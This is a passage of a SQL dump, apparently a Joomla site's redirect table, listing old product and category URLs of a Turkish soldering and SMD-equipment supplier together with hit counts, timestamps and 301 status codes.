00:00:00',301),(31574,'http://www.3s-technologies.com.tr/en/index.php?option=ilkeler',NULL,'','',1,0,'2023-01-11 04:30:21','0000-00-00 00:00:00',301),(31575,'http://www.3s-technologies.com.tr/en/index.php?option=ik',NULL,'','',1,0,'2023-01-11 04:30:22','0000-00-00 00:00:00',301),(31576,'http://www.3s-technologies.com.tr/en/index.php?option=iletisim',NULL,'','',1,0,'2023-01-11 04:30:32','0000-00-00 00:00:00',301),(31577,'https://3s-technologies.com.tr/index.php/en/products/konveyorler',NULL,'','',1,0,'2023-01-11 04:32:11','0000-00-00 00:00:00',301),(31578,'https://3s-technologies.com.tr/index.php/en/contacts-en',NULL,'','',1,0,'2023-01-11 04:32:12','0000-00-00 00:00:00',301),(31579,'https://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme',NULL,'','',17,0,'2023-01-11 04:32:13','0000-00-00 00:00:00',301),(31580,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri',NULL,'','',1,0,'2023-01-11 04:32:14','0000-00-00 00:00:00',301),(31581,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim',NULL,'','',1,0,'2023-01-11 04:32:16','0000-00-00 00:00:00',301),(31582,'https://3s-technologies.com.tr/index.php/en/products/manufacturers/mirae',NULL,'','',1,0,'2023-01-11 04:32:19','0000-00-00 00:00:00',301),(31583,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux',NULL,'','',1,0,'2023-01-11 04:32:20','0000-00-00 00:00:00',301),(31584,'https://3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',2,0,'2023-01-11 04:32:21','0000-00-00 00:00:00',301),(31585,'https://3s-technologies.com.tr/index.php/en/products/manufacturers/panasonic',NULL,'','',1,0,'2023-01-11 04:32:27','0000-00-00 00:00:00',301),(31586,'https://3s-technologies.com.tr/index.php/en/products/çubuk-lehim',NULL,'','',19,0,'2023-01-11 04:32:29','0000-00-00 00:00:00',301),(31587,'https://3s-technologies.com.tr/index.php/en/products/tel-lehim',NULL,'','',1,0,'2023-01-11 04:32:31','0000-00-00 00:00:00',301),(31588,'https://3s-technologies.com.tr/index.php/en/products/screen-printer',NULL,'','',1,0,'2023-01-11 04:32:33','0000-00-00 00:00:00',301),(31589,'https://3s-technologies.com.tr/index.php/en/products/dalga-lehim',NULL,'','',1,0,'2023-01-11 04:32:41','0000-00-00 00:00:00',301),(31590,'https://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri',NULL,'','',1,0,'2023-01-11 04:32:43','0000-00-00 00:00:00',301),(31591,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',21,0,'2023-01-11 04:32:46','0000-00-00 00:00:00',301),(31592,'https://3s-technologies.com.tr/index.php/en/products/flux',NULL,'','',1,0,'2023-01-11 04:32:49','0000-00-00 00:00:00',301),(31593,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim',NULL,'','',8,0,'2023-01-11 04:32:50','0000-00-00 00:00:00',301),(31594,'https://3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',1,0,'2023-01-11 04:32:53','0000-00-00 00:00:00',301),(31595,'https://3s-technologies.com.tr/index.php/en/products/manufacturers/tolo',NULL,'','',1,0,'2023-01-11 04:32:59','0000-00-00 00:00:00',301),(31596,'https://3s-technologies.com.tr/index.php/en/products/manufacturers/aqueous',NULL,'','',1,0,'2023-01-11 04:33:00','0000-00-00 00:00:00',301),(31597,'https://3s-technologies.com.tr/index.php/en/products/manufacturers/ddm-novastar',NULL,'','',1,0,'2023-01-11 04:33:05','0000-00-00 00:00:00',301),(31598,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız',NULL,'','',18,0,'2023-01-11 04:33:07','0000-00-00 00:00:00',301),(31599,'https://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı',NULL,'','',14,0,'2023-01-11 04:33:09','0000-00-00 00:00:00',301),(31600,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı',NULL,'','',15,0,'2023-01-11 04:33:15','0000-00-00 00:00:00',301),(31601,'https://3s-technologies.com.tr/index.php/en/products/thru-hole',NULL,'','',1,0,'2023-01-11 04:33:23','0000-00-00 00:00:00',301),(31602,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim',NULL,'','',16,0,'2023-01-11 04:33:56','0000-00-00 00:00:00',301),(31603,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail',NULL,'','',7,0,'2023-01-11 04:34:05','0000-00-00 00:00:00',301),(31604,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail',NULL,'','',8,0,'2023-01-11 04:34:09','0000-00-00 00:00:00',301),(31605,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name?language=tr-tr',NULL,'','',2,0,'2023-01-11 04:34:11','0000-00-00 00:00:00',301),(31606,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme',NULL,'','',25,0,'2023-01-11 04:34:18','0000-00-00 00:00:00',301),(31607,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:34:18','0000-00-00 00:00:00',301),(31608,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_sku?language=tr-tr',NULL,'','',2,0,'2023-01-11 04:34:20','0000-00-00 00:00:00',301),(31609,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:34:22','0000-00-00 00:00:00',301),(31610,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',11,0,'2023-01-11 04:34:23','0000-00-00 00:00:00',301),(31611,'https://3s-technologies.com.tr/index.php/tr/ueruenler',NULL,'','',1,0,'2023-01-11 04:34:27','0000-00-00 00:00:00',301),(31612,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail',NULL,'','',15,0,'2023-01-11 04:34:30','0000-00-00 00:00:00',301),(31613,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:34:36','0000-00-00 00:00:00',301),(31614,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/jvk-detail',NULL,'','',1,0,'2023-01-11 04:34:39','0000-00-00 00:00:00',301),(31615,'https://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:34:41','0000-00-00 00:00:00',301),(31616,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:34:44','0000-00-00 00:00:00',301),(31617,'https://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-detail',NULL,'','',1,0,'2023-01-11 04:34:51','0000-00-00 00:00:00',301),(31618,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/lfs-1-detail',NULL,'','',1,0,'2023-01-11 04:34:54','0000-00-00 00:00:00',301),(31619,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:34:54','0000-00-00 00:00:00',301),(31620,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:34:58','0000-00-00 00:00:00',301),(31621,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:04','0000-00-00 00:00:00',301),(31622,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',28,0,'2023-01-11 04:35:07','0000-00-00 00:00:00',301),(31623,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:09','0000-00-00 00:00:00',301),(31624,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:10','0000-00-00 00:00:00',301),(31625,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',14,0,'2023-01-11 04:35:11','0000-00-00 00:00:00',301),(31626,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:14','0000-00-00 00:00:00',301),(31627,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',1,0,'2023-01-11 04:35:17','0000-00-00 00:00:00',301),(31628,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:20','0000-00-00 00:00:00',301),(31629,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:20','0000-00-00 00:00:00',301),(31630,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:22','0000-00-00 00:00:00',301),(31631,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:23','0000-00-00 00:00:00',301),(31632,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:23','0000-00-00 00:00:00',301),(31633,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',15,0,'2023-01-11 04:35:24','0000-00-00 00:00:00',301),(31634,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:26','0000-00-00 00:00:00',301),(31635,'https://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',1,0,'2023-01-11 04:35:28','0000-00-00 00:00:00',301),(31636,'https://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',1,0,'2023-01-11 04:35:30','0000-00-00 00:00:00',301),(31637,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',1,0,'2023-01-11 04:35:31','0000-00-00 00:00:00',301),(31638,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:33','0000-00-00 00:00:00',301),(31639,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:41','0000-00-00 00:00:00',301),(31640,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name?language=tr-tr',NULL,'','',4,0,'2023-01-11 04:35:42','0000-00-00 00:00:00',301),(31641,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',1,0,'2023-01-11 04:35:44','0000-00-00 00:00:00',301),(31642,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim',NULL,'','',1,0,'2023-01-11 04:35:44','0000-00-00 00:00:00',301),(31643,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:45','0000-00-00 00:00:00',301),(31644,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:51','0000-00-00 00:00:00',301),(31645,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:52','0000-00-00 00:00:00',301),(31646,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:35:54','0000-00-00 00:00:00',301),(31647,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',1,0,'2023-01-11 04:35:55','0000-00-00 00:00:00',301),(31648,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',1,0,'2023-01-11 04:35:57','0000-00-00 00:00:00',301),(31649,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:00','0000-00-00 00:00:00',301),(31650,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-28-detail',NULL,'','',1,0,'2023-01-11 04:36:02','0000-00-00 00:00:00',301),(31651,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:04','0000-00-00 00:00:00',301),(31652,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/aqueous',NULL,'','',1,0,'2023-01-11 04:36:10','0000-00-00 00:00:00',301),(31653,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:11','0000-00-00 00:00:00',301),(31654,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar',NULL,'','',1,0,'2023-01-11 04:36:12','0000-00-00 00:00:00',301),(31655,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',1,0,'2023-01-11 04:36:13','0000-00-00 00:00:00',301),(31656,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız?language=tr-tr',NULL,'','',2,0,'2023-01-11 04:36:15','0000-00-00 00:00:00',301),(31657,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic',NULL,'','',1,0,'2023-01-11 04:36:16','0000-00-00 00:00:00',301),(31658,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:17','0000-00-00 00:00:00',301),(31659,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo',NULL,'','',1,0,'2023-01-11 04:36:19','0000-00-00 00:00:00',301),(31660,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:20','0000-00-00 00:00:00',301),(31661,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',1,0,'2023-01-11 04:36:22','0000-00-00 00:00:00',301),(31662,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/ddm-novastar',NULL,'','',7,0,'2023-01-11 04:36:23','0000-00-00 00:00:00',301),(31663,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:27','0000-00-00 00:00:00',301),(31664,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:28','0000-00-00 00:00:00',301),(31665,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:29','0000-00-00 00:00:00',301),(31666,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/panasonic',NULL,'','',1,0,'2023-01-11 04:36:30','0000-00-00 00:00:00',301),(31667,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:32','0000-00-00 00:00:00',301),(31668,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:36','0000-00-00 00:00:00',301),(31669,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:38','0000-00-00 00:00:00',301),(31670,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/asp-300-detail',NULL,'','',1,0,'2023-01-11 04:36:38','0000-00-00 00:00:00',301),(31671,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:42','0000-00-00 00:00:00',301),(31672,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:43','0000-00-00 00:00:00',301),(31673,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-detail',NULL,'','',1,0,'2023-01-11 04:36:45','0000-00-00 00:00:00',301),(31674,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/sp-18p-l-detail',NULL,'','',1,0,'2023-01-11 04:36:46','0000-00-00 00:00:00',301),(31675,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-42-detail',NULL,'','',1,0,'2023-01-11 04:36:51','0000-00-00 00:00:00',301),(31676,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name?language=tr-tr',NULL,'','',2,0,'2023-01-11 04:36:53','0000-00-00 00:00:00',301),(31677,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın?language=tr-tr',NULL,'','',2,0,'2023-01-11 04:36:54','0000-00-00 00:00:00',301),(31678,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:36:57','0000-00-00 00:00:00',301),(31679,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-detail',NULL,'','',1,0,'2023-01-11 04:37:00','0000-00-00 00:00:00',301),(31680,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:02','0000-00-00 00:00:00',301),(31681,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/dirdesc?language=tr-tr',NULL,'','',2,0,'2023-01-11 04:37:03','0000-00-00 00:00:00',301),(31682,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/kester',NULL,'','',1,0,'2023-01-11 04:37:05','0000-00-00 00:00:00',301),(31683,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:07','0000-00-00 00:00:00',301),(31684,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:11','0000-00-00 00:00:00',301),(31685,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae',NULL,'','',1,0,'2023-01-11 04:37:12','0000-00-00 00:00:00',301),(31686,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail',NULL,'','',6,0,'2023-01-11 04:37:13','0000-00-00 00:00:00',301),(31687,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name?language=tr-tr',NULL,'','',3,0,'2023-01-11 04:37:13','0000-00-00 00:00:00',301),(31688,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı',NULL,'','',20,0,'2023-01-11 04:37:15','0000-00-00 00:00:00',301),(31689,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı',NULL,'','',15,0,'2023-01-11 04:37:17','0000-00-00 00:00:00',301),(31690,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail',NULL,'','',8,0,'2023-01-11 04:37:19','0000-00-00 00:00:00',301),(31691,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:20','0000-00-00 00:00:00',301),(31692,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:22','0000-00-00 00:00:00',301),(31693,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:24','0000-00-00 00:00:00',301),(31694,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:25','0000-00-00 00:00:00',301),(31695,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/aqueous',NULL,'','',1,0,'2023-01-11 04:37:28','0000-00-00 00:00:00',301),(31696,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:30','0000-00-00 00:00:00',301),(31697,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın',NULL,'','',18,0,'2023-01-11 04:37:32','0000-00-00 00:00:00',301),(31698,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail',NULL,'','',9,0,'2023-01-11 04:37:35','0000-00-00 00:00:00',301),(31699,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:40','0000-00-00 00:00:00',301),(31700,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:42','0000-00-00 00:00:00',301),(31701,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:42','0000-00-00 00:00:00',301),(31702,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:44','0000-00-00 00:00:00',301),(31703,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:44','0000-00-00 00:00:00',301),(31704,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:46','0000-00-00 00:00:00',301),(31705,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:48','0000-00-00 00:00:00',301),(31706,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:49','0000-00-00 00:00:00',301),(31707,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/mx200lp-detail',NULL,'','',7,0,'2023-01-11 04:37:50','0000-00-00 00:00:00',301),(31708,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/cm-602-l-detail',NULL,'','',8,0,'2023-01-11 04:37:51','0000-00-00 00:00:00',301),(31709,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/ly-8c-detail',NULL,'','',10,0,'2023-01-11 04:37:53','0000-00-00 00:00:00',301),(31710,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:56','0000-00-00 00:00:00',301),(31711,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:58','0000-00-00 00:00:00',301),(31712,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:37:59','0000-00-00 00:00:00',301),(31713,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:03','0000-00-00 00:00:00',301),(31714,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız',NULL,'','',12,0,'2023-01-11 04:38:07','0000-00-00 00:00:00',301),(31715,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',10,0,'2023-01-11 04:38:10','0000-00-00 00:00:00',301),(31716,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/jv131-detail',NULL,'','',1,0,'2023-01-11 04:38:12','0000-00-00 00:00:00',301),(31717,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',1,0,'2023-01-11 04:38:13','0000-00-00 00:00:00',301),(31718,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/npm-detail',NULL,'','',8,0,'2023-01-11 04:38:15','0000-00-00 00:00:00',301),(31719,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/trident-detail',NULL,'','',1,0,'2023-01-11 04:38:16','0000-00-00 00:00:00',301),(31720,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:18','0000-00-00 00:00:00',301),(31721,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,category_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:20','0000-00-00 00:00:00',301),(31722,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:21','0000-00-00 00:00:00',301),(31723,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri',NULL,'','',1,0,'2023-01-11 04:38:26','0000-00-00 00:00:00',301),(31724,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/dirdesc?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:28','0000-00-00 00:00:00',301),(31725,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole',NULL,'','',1,0,'2023-01-11 04:38:32','0000-00-00 00:00:00',301),(31726,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_sku?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:32','0000-00-00 00:00:00',301),(31727,'https://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',1,0,'2023-01-11 04:38:34','0000-00-00 00:00:00',301),(31728,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,mf_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:35','0000-00-00 00:00:00',301),(31729,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&type=atom&lang=tr',NULL,'','',1,0,'2023-01-11 04:38:38','0000-00-00 00:00:00',301),(31730,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name?language=tr-tr',NULL,'','',1,0,'2023-01-11 04:38:40','0000-00-00 00:00:00',301),(31731,'http://3s-technologies.com.tr/tr/index_files/filelist.xml',NULL,'','',1,0,'2023-01-11 04:38:44','0000-00-00 00:00:00',301),(31732,'http://www.3s-technologies.com.tr/joomla/index.php?format=feed&type=rss&lang=tr',NULL,'','',1,0,'2023-01-11 04:38:49','0000-00-00 00:00:00',301),(31733,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&itemid=50&lang=tr',NULL,'','',1,0,'2023-01-11 04:38:59','0000-00-00 00:00:00',301),(31734,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&itemid=61&lang=tr',NULL,'','',1,0,'2023-01-11 04:39:03','0000-00-00 00:00:00',301),(31735,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&itemid=2&lang=tr',NULL,'','',1,0,'2023-01-11 04:39:08','0000-00-00 